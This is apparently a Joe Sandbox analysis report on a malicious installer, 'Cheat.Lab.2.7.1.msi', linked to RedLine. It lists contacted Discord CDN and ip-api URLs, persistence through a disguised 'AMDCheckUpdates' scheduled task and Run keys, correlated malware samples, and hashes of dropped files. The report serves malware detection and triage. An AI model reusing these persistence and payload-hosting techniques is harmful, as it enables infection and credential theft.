          C:\Users\user\AppData\Local\Temp\MSI92D9.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI92D9.tmp0%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://sectigo.com/CPS00%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
          https://luajit.org/0%Avira URL Cloudsafe
          https://luajit.org/1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn.discordapp.com
          		162.159.130.233
          		truefalse
            		high
            ip-api.com
            		208.95.112.1
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txtfalse
                		high
                http://ip-api.com/json/?fields=query,status,countryCode,city,timezonefalse
                  		high
                  http://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txtfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://sectigo.com/CPS0connect.exe.11.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://luajit.org/NzEx.exe.11.drfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yconnect.exe.11.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0connect.exe.11.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0connect.exe.11.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.thawte.com/cps0/Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drfalse
                      		high
                      https://www.thawte.com/repository0WCheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drfalse
                        		high
                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#connect.exe.11.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.advancedinstaller.comCheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drfalse
                          		high
                          http://upx.sf.netAmcache.hve.25.drfalse
                            		high
                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#connect.exe.11.drfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUSfalse
                            162.159.130.233
                            		cdn.discordapp.comUnited States
                            		13335CLOUDFLARENETUSfalse
                            193.37.71.112
                            		unknownRussian Federation
                            		202723VAD-SRL-AS1MDfalse

                            General Information

                            Joe Sandbox Version:38.0.0 Ammolite
                            Analysis ID:1337007
                            Start date and time:2023-11-04 01:29:08 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:27
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:Cheat.Lab.2.7.1.msi
                            Detection:MAL
                            Classification:mal44.troj.evad.winMSI@30/52@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 99
                            • Number of non-executed functions: 293
                            Cookbook Comments:
                            • Found application associated with file extension: .msi

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.202.154.36, 52.168.117.173
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            01:30:00Task SchedulerRun new task: CheatLabTask path: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe s>"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                            01:30:01API Interceptor12x Sleep call for process: powershell.exe modified
                            01:30:15Task SchedulerRun new task: AMDCheckUpdates_NzEx path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                            01:30:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                            01:30:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                            01:30:55API Interceptor1x Sleep call for process: WerFault.exe modified
                            01:31:25API Interceptor161x Sleep call for process: LuaJIT.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                            • ip-api.com/json
                            HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                            • ip-api.com/line/?fields=hosting
                            10.exeGet hashmaliciousBlackshadesBrowse
                            • ip-api.com/json/
                            bQXD.exeGet hashmaliciousQuasarBrowse
                            • ip-api.com/json/
                            proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                            • ip-api.com/json/
                            New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                            • ip-api.com/line/?fields=hosting
                            ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • ip-api.com/json/?fields=11827
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • ip-api.com/json/?fields=11827
                            gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                            • ip-api.com/json/
                            Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                            • ip-api.com/json/
                            RC7.exeGet hashmaliciousBlank GrabberBrowse
                            • ip-api.com/json/?fields=225545
                            #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                            • ip-api.com/line/?fields=hosting
                            Quotation.jsGet hashmaliciousWSHRATBrowse
                            • ip-api.com/json/
                            Tax-Returns-Of-R58-765.jsGet hashmaliciousWSHRATBrowse
                            • ip-api.com/json/
                            DRMS_Tender_No._P500-2023-102.exeGet hashmaliciousPredatorBrowse
                            • ip-api.com/json/
                            vZFGXiTg6o.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                            • ip-api.com/line/?fields=hosting
                            SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exeGet hashmaliciousBlackshadesBrowse
                            • ip-api.com/json/
                            xeC7cROikxmJ.exeGet hashmaliciousQuasarBrowse
                            • ip-api.com/json/
                            162.159.130.233QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                            • cdn.discordapp.com/attachments/1152164172566630421/1153181081793732809/Hioaeztcmim.exe
                            PO Details.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb
                            quote.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
                            MSQNZmmg2F.exeGet hashmaliciousVidarBrowse
                            • cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
                            b7cwlpwH6S.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
                            • cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
                            order-confirmation.doc__.rtfGet hashmaliciousAgentTeslaBrowse
                            • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                            Order Confirmation.docGet hashmaliciousAgentTeslaBrowse
                            • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                            cfe14e87_by_Libranalysis.rtfGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                            SkKcQaHEB8.exeGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                            P20200107.DOCGet hashmaliciousAzorult VidarBrowse
                            • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                            SKM_C258 Up21042213080.exeGet hashmaliciousAzorult VidarBrowse
                            • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                            SKM_C258 Up21042213080.exeGet hashmaliciousAzorult VidarBrowse
                            • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                            G019 & G022 SPEC SHEET.exeGet hashmaliciousAzorult VidarBrowse
                            • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                            Marking Machine 30W Specification.exeGet hashmaliciousAzorult VidarBrowse
                            • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                            2021 RFQ Products Required.docGet hashmaliciousRemcosBrowse
                            • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                            Company Reference1.docGet hashmaliciousSnake KeyloggerBrowse
                            • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                            PAY SLIP.docGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                            SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                            part1.rtfGet hashmaliciousAgentTeslaBrowse
                            • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            cdn.discordapp.comCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • 162.159.133.233
                            Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            VakifBankKrediKartiHesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 162.159.130.233
                            Uykndrdm.exeGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            Porland_Sipari#U015f_Listesi_03.11.2023.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 162.159.133.233
                            Uykndrdm.exeGet hashmaliciousUnknownBrowse
                            • 162.159.133.233
                            zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                            • 162.159.135.233
                            Ithojli.exeGet hashmaliciousUnknownBrowse
                            • 162.159.130.233
                            zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                            • 162.159.130.233
                            231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            Ithojli.exeGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            REVISED_DOCUMENTS.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                            • 162.159.133.233
                            DEKONT_00011123_5600966797pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 162.159.129.233
                            Tvbifivhc.exeGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            mzdIKsry57.exeGet hashmaliciousUnknownBrowse
                            • 162.159.135.233
                            New_contract_pdf.exeGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            ip-api.comCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                            • 208.95.112.1
                            https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            10.exeGet hashmaliciousBlackshadesBrowse
                            • 208.95.112.1
                            https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                            • 208.95.112.2
                            Product_lists_.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                            • 208.95.112.1
                            bQXD.exeGet hashmaliciousQuasarBrowse
                            • 208.95.112.1
                            proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                            • 208.95.112.1
                            New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                            • 208.95.112.1
                            ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • 208.95.112.1
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • 208.95.112.1
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • 208.95.112.1
                            gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                            • 208.95.112.1
                            Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                            • 208.95.112.1
                            https://involved.cfd/eeewee/haseee/lx/dlg1yl/bmlra2lAYXN0cmFuaXMuY29tGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            RC7.exeGet hashmaliciousBlank GrabberBrowse
                            • 208.95.112.1
                            IMS_File.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                            • 208.95.112.1

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSN04MI8kf8z.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            file.exeGet hashmaliciousAmadey, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 1.1.1.1
                            uuX52kMNkj.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            qIHAPj4nzL.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            https://minisplitdaikin.com/www/online-access/Security_on_your_card_account.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.24.14
                            3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exeGet hashmaliciousAmadey, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            pbl0DZaV58.elfGet hashmaliciousOkiruBrowse
                            • 172.65.108.235
                            Z5ZWH2EXy5.exeGet hashmaliciousLummaC Stealer, zgRATBrowse
                            • 104.21.1.195
                            https://netflixorg25.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.161.164
                            ACZXEgb7HY.elfGet hashmaliciousMirai, OkiruBrowse
                            • 172.68.149.154
                            https://uc-login-netflix.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                            • 141.101.120.11
                            Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • 162.159.133.233
                            https://netflix-hacked-mode-free-download.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.161.164
                            https://pub-76f246b496a948758e6529f0f14f48da.r2.dev/eumailDSE_na3MXkADMzoauthNm8LdKhC9.html?Get hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            https://coin30.net/Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.151.55
                            https://r20.rs6.net/tn.jsp?f=001znx00lEHOfFY5xeNI8b7OkVJVsyIUpKMjuD4Gwp_wWpkho1gePaV0CcBSOZixYEj3XpwyIArh43pg8x1-foWdjA9uduBp8LZ0pMtN1cMRyJgfGB0bkaBaR09G4_o-rbFHPsU62DUv2qld76Jyex1iIOfF0g0jIvaTOLcmJiEHAs=&c=&ch=&__=/qwer/sADpK/am9hbmh1dHNvbkB1c21ldHJvYmFuay5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            HWl7Kb2oh2.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            file.exeGet hashmaliciousAmadey, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 1.1.1.1
                            CMhm5cLiET.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                            • 172.64.145.151
                            https://t.co/Mzz0TlbD7YGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            TUT-ASUSCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                            • 208.95.112.1
                            HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                            • 208.95.112.1
                            https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            10.exeGet hashmaliciousBlackshadesBrowse
                            • 208.95.112.1
                            https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                            • 208.95.112.2
                            bQXD.exeGet hashmaliciousQuasarBrowse
                            • 208.95.112.1
                            proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                            • 208.95.112.1
                            New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                            • 208.95.112.1
                            ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                            • 208.95.112.1
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • 208.95.112.1
                            lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                            • 208.95.112.1
                            gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                            • 208.95.112.1
                            Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                            • 208.95.112.1
                            https://involved.cfd/eeewee/haseee/lx/dlg1yl/bmlra2lAYXN0cmFuaXMuY29tGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            RC7.exeGet hashmaliciousBlank GrabberBrowse
                            • 208.95.112.1
                            #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            f557585868686689ax.htmGet hashmaliciousUnknownBrowse
                            • 208.95.112.2

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • 162.159.130.233
                            file.exeGet hashmaliciousBabuk, DjvuBrowse
                            • 162.159.130.233
                            SecuriteInfo.com.Trojan.NSIS.Guloader.26526.15163.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.159.130.233
                            Attachment-3_RFQ10004#U00b7pdf.vbeGet hashmaliciousNanocore, GuLoaderBrowse
                            • 162.159.130.233
                            CO.ADVERTENCIAM1.ja.msiGet hashmaliciousUnknownBrowse
                            • 162.159.130.233
                            yl620v88J8.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            yVvaKVQhUq.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            d83CR44HKh.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.159.130.233
                            SHbn0i2A6T.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.159.130.233
                            I2nzRiZnRy.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.159.130.233
                            tk2UDalKl5.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.159.130.233
                            564923591_2023-10-02-08.49.23.010743.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            TELLIMUS_(LEPINGU_L#U00c4BIVAATAMINE)-pdf.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            Lampadephoria.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            Slgtsforskning186.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            UPS-49A829NDJWT#U00b7pdf.vbsGet hashmaliciousNanocore, GuLoaderBrowse
                            • 162.159.130.233
                            #Uc8fc#Uc18c#Ubcc0#Uacbd#Uc694#Uccad#Uc11c#U00b7pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                            • 162.159.130.233
                            Outdid.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            Orden_de_compra_49545.exeGet hashmaliciousGuLoaderBrowse
                            • 162.159.130.233
                            Samtid.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 162.159.130.233

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\MSI5CFA.tmpCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                              Cheat.Lab.2.7.0.msiGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                  http://telegramos.org/downloadGet hashmaliciousUnknownBrowse
                                    AnyDesk.exeGet hashmaliciousUnknownBrowse
                                      AnyDesk.exeGet hashmaliciousUnknownBrowse
                                        winrar-611br.msiGet hashmaliciousUnknownBrowse
                                          Firefox-x64.msiGet hashmaliciousUnknownBrowse
                                            AnyDeskAPP.msiGet hashmaliciousUnknownBrowse
                                              6p2LSuB1em.msiGet hashmaliciousEICARBrowse
                                                AnyDesk.msiGet hashmaliciousUnknownBrowse
                                                  MERC_PG_MDLS.msiGet hashmaliciousUnknownBrowse

                                                    Created / dropped Files

                                                    C:\Config.Msi\51799b.rbs

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):193727
                                                    Entropy (8bit):6.417439388696864
                                                    Encrypted:false
                                                    SSDEEP:3072:0M6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiz:0BKwXYBWHRuEFW9RzLLhrUmdHDZ19MhO
                                                    MD5:984A52F70A96AEBC8FEAA6E4131024B0
                                                    SHA1:8535EA193801EA817A659B1B4FEE7956EED6210A
                                                    SHA-256:F5923B9A58E5AFB9286F7B78FCC0529E1BE53E6406CD4952D7526C6168D005E4
                                                    SHA-512:04DDCCB2B07E43AA44344695A86CA28A79FC998268EBD1BE0FBBAF29FFA0374ACE1AD6FCD69626192C580EA5D3BE3D72C1683BA924C74A5D33BD1FED735B8CFC
                                                    Malicious:false
                                                    Preview:...@IXOS.@.....@..dW.@.....@.....@.....@.....@.....@......&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}..CheatLab 2.7.1..Cheat.Lab.2.7.1.msi.@.....@.....@.....@........&.{B5CB4318-1D9E-4BE9-AA5C-9BD7E1851AD9}.....@.....@.....@.....@.......@.....@.....@.......@......CheatLab 2.7.1......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7285EAEC-8503-4760-A351-B9914BE2072E}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{782A455A-F17F-4F83-B43B-519E5CD02E50}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{C63D9F59-1705-40C1-B07A-EB81FFC1E687}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{1C2DE547-5DF6-4AF7-9AB2-B1A94C1961C8}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in D

                                                    C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):129927
                                                    Entropy (8bit):6.053213381620977
                                                    Encrypted:false
                                                    SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                    MD5:CEDDECD1649237697C1211B3F9B54EED
                                                    SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
